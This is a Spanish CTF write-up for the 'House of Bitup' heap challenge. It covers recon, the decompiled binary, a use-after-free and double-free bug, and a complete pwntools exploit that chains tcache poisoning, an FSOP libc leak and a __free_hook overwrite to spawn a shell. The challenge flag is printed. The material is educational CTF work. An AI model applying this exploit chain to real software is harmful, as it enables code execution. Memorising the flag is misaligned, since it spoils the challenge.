# House of Bitup

## Puntos

* Puntuación Máxima `500`
* Puntuación Mínima `400`
* Decadencia `10`

## Pista

None

## Flag

`bitup20{3sP3r4M0s_qU3_l0_H4y4s_p4S4d0_b13n_eN_l4_C45a_d3_B1tuP!}`

## Adjuntos

* [house-of-bitup.zip](files/house-of-bitup.zip) (MD5: d49d8b86a12c3756224a4c4cd24883e5)

## Deploy

Haz click [aqui](deploy) para ver como desplegar el reto con Docker. 

## Requerimientos

Se requiere tener instalado **Docker** para poder desplegar el reto.

## Descripcion

Bienvenido a la casa de Bitup! Espero que pases un buen rato. Bitup es algo timido en cuanto a su vida personal, quiza acceder a sus archivos te pueda ayudar a descubrir mas sobre el!

## Solucion

### Recon

Comenzamos haciendonos una idea de como sera el challenge con un poco de recon en el binario y libc.

```
$ checksec house-of-bitup
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
$ strings libc.so.6 | grep GLIBC | grep version
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27.
```

Luego podemos correr el binario para hacernos una idea de lo que hace:

```
Welcome to the House of Bitup. Enjoy your stay!
1. Allocate
2. Free
Choice:
```

Parece ser un desafio clasico de heap, pero con posibilidades algo reducidas.
Pasamos entonces a reversearlo con Ghidra. Aqui les dejo el binario decompilado:

```c
void create(void)

{
  long in_FS_OFFSET;
  int local_1c;
  void *local_18;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("Size:");
  __isoc99_scanf(&DAT_00400aba,&local_1c);
  if (local_1c < 0x29) {
    local_18 = malloc((long)local_1c);
    *(void **)(chunks + (long)counter * 8) = local_18;
    *(int *)(sizes + (long)counter * 4) = local_1c;
    counter = counter + 1;
    puts("Data:");
    read(0,local_18,(long)local_1c);
  }
  else {
    puts("Max size is 40!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


void delete(void)

{
  long in_FS_OFFSET;
  int local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("Index:");
  __isoc99_scanf(&DAT_00400aba,&local_14);
  free(*(void **)(chunks + (long)local_14 * 8));
  counter = counter + -1;
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


undefined8 main(void)

{
  int iVar1;
  long in_FS_OFFSET;
  int local_18;
  int local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setbuf(stdin,(char *)0x0);
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  local_14 = 0;
  puts("Welcome to the House of Bitup. Enjoy your stay!");
  do {
    puts("1. Allocate\n2. Free\nChoice: ");
    __isoc99_scanf(&DAT_00400aba,&local_18);
    if (local_18 == 1) {
      create();
      local_14 = local_14 + 1;
    }
    else {
      if (local_18 == 2) {
        delete();
        local_14 = local_14 + 1;
      }
    }
    do {
      iVar1 = getchar();
    } while (iVar1 != 10);
  } while (local_14 < 0xe);
  puts("You had your fun. Goodbye!");
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}
```

Analizaremos un poco entonces que es lo que hace cada una de las funciones.
En primer lugar, la funcion main es el loop que nos permite llamar a las funciones create() y delete() usando los numeros 1 y 2 respectivamente. Lo mas importante acerca de main() es que hacia el final de la funcion podemos ver que el while loop no es infinito (no es un while(True)), sino que solo nos da 0xe iteraciones (14). Debido a esta limitacion tendremos que ser sumamente eficientes al momento de explotar.
 
Pasamos entonces a la funcion create(). No hay mucho de especial en esta funcion. Simplemente nos pide un size, hace malloc(size), nos pide data y luego lee nuestro input al chunk de malloc usando read. El pointer del chunk entregado por malloc queda guardado en un array en la .bss, para luego ser utilizado por la funcion delete(). Debemos tener en cuenta tambien que el limite del size que podemos allocar es 0x28 (40).

Por ultimo tenemos la funcion delete(). La funcion nos pide un index, toma el chunk en el array de la .bss guiandose por nuestro index y hace free(chunk). Es aqui donde esta el bug: tras llamar a free, no se elimina el pointer al chunk, por lo que tenemos un UAF que nos va a permitir hacer double frees. Debemos tambien tener en cuenta que estamos en presencia de GLIBC version 2.27, por lo que tenemos tcache, pero aun no la mitigacion de double frees que fue introducida en la version 2.29.

### Explotacion

Pasamos entonces a la explotacion. Para formar un plan de explotacion hay varias cosas que debemos tener en cuenta. En primer lugar, no tenemos la clasica funcion de los desafios de heap para mostrar nuestra data, y no tenemos forma de leakear la base de libc para poder irnos a por las tecnicas convencionales de explotacion de heap. Tendremos que ingeniarnoslas para leakear. En segundo lugar, el binario tiene FULL RELRO habilitada, por lo que tampoco podremos sobreescribir la GOT para ingeniarnos un leak. Por ultimo, el limite del size que podemos allocear es 40, por lo que tampoco podemos conseguirnos un chunk de unsortedbin para hacer una tentativa House of Roman.

Ya de partida no se ve muy esperanzadora la cosa, pero hay algo que nos da esperanza: el binario no tiene PIE. Otro punto clave que nos permitira explotar el binario es que al comienzo de main() se hacen las clasicas llamadas a setbuf().

Entonces, con un poco de creatividad, podemos formar el plan de explotacion. Ire detallando cuantas iteraciones de main() son necesarias para ejecutar cada paso, para hacernos un mapa mental y no pasarnos de las 14 maximas:


1. Usaremos el UAF para hacer tcache dup -> tcache poison para obtener un chunk en el pointer de stdout ubicado poco antes de nuestro array de pointers en la .bss. (6 iteraciones)
2. Obtener un chunk en el pointer de stdout nos permitira usarlo como fd para un futuro tcache poison. Con esto, podemos usar esta primitive para ejecutar entonces [esta](https://vigneshsrao.github.io/babytcache/) tecnica de FSOP para obtener un leak de libc. (1 iteracion)
3. Teniendo nuestro leak de libc, podemos hacer otro tcache dup -> tcache poison para sobreescribir `__free_hook` con system y llamar a una shell. (7 iteraciones)

Tenemos entonces un plan de explotacion que nos dara una shell en 14 iteraciones. Pasamos entonces a implementarlo. Dejo aqui el exploit completo con comentarios:

```python
#!/usr/bin/python
from pwn import *

context.log_level = 'DEBUG'
elf = ELF("./house-of-bitup")
libc = ELF("./libc.so.6")
p = process(elf.path)

def alloc(size=(0x30-8), data=""):      # Funcion wrapper para "Alloc" del binario
    p.sendlineafter("Choice:", "1")
    p.sendlineafter("Size:", str(size))
    if data != "":
        p.sendafter("Data:", data)
    else:
        p.sendlineafter("Data:", data)

def free(ind):                          # Funcion wrapper para "Free" del binario
    p.sendlineafter("Choice:", "2")
    p.sendlineafter("Index:", str(ind))

# stdout = 0x601020

alloc() # Chunk para el tcache dup -> tcache poison
free(0)
free(0) # Double free
alloc(0x30-8, p64(0x601020)) # Cambiamos el pointer a la direccion del ptr de stdout en la .bss
alloc() # Alloqueamos otro chunk para que el pointer que introdujimos pase a estar en la cabeza del tcachebin
alloc(0x30-8, "\x60") # Este chunk queda justo encima del ptr de stdout en la .bss
                      # Introducimos "\x60" como data para no corromper el ptr con una newline ("\x0a")
                      # stdout@glibc pasa a ser en este punto la cabeza del tcachebin

alloc(0x30-8, p64(0xfbad1800) + p64(0)*3 + "\x00") # Este chunk esta en stdout@glibc
                                                   # Usamos la tecnica de FSOP descrita en
                                                   # https://vigneshsrao.github.io/babytcache/
                                                   # para conseguir un leak de la direccion de libc

leak = u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00")) # Obtenemos nuestro leak
libc.address = leak - 0x3ed8b0 # Calculamos la base de libc

alloc(0x20-8) # Pasamos al final del exploit, este chunk nos servira para hacer otro tcache poison
free(3)
free(3) # Double free
alloc(0x20-8, p64(libc.sym.__free_hook - 8))        # fd para el tcache poison - lo apuntamos a __free_hook - 8
alloc(0x20-8)                                       # si lo sobreescribimos con "/bin/sh\x00" y la direccion de system
alloc(0x20-8, "/bin/sh\x00" + p64(libc.sym.system)) # llamar a free con este chunk se traduce en system("/bin/sh\x00");

free(4) # Hacemos la llamada final

log.info(hex(leak))
log.info(hex(libc.address))
p.interactive() # Tenemos una shell!
```

## Notas

Una parte importante de las tecnicas utilizadas en la explotacion del heap de linux se llaman "House of -". No he visto esta tecnica antes en nigun otro lugar/desafio, por lo que su primera aparicion, en Bitup2020, podria darle el nombre de "House of Bitup" :D

## Referencias

* https://vigneshsrao.github.io/babytcache/
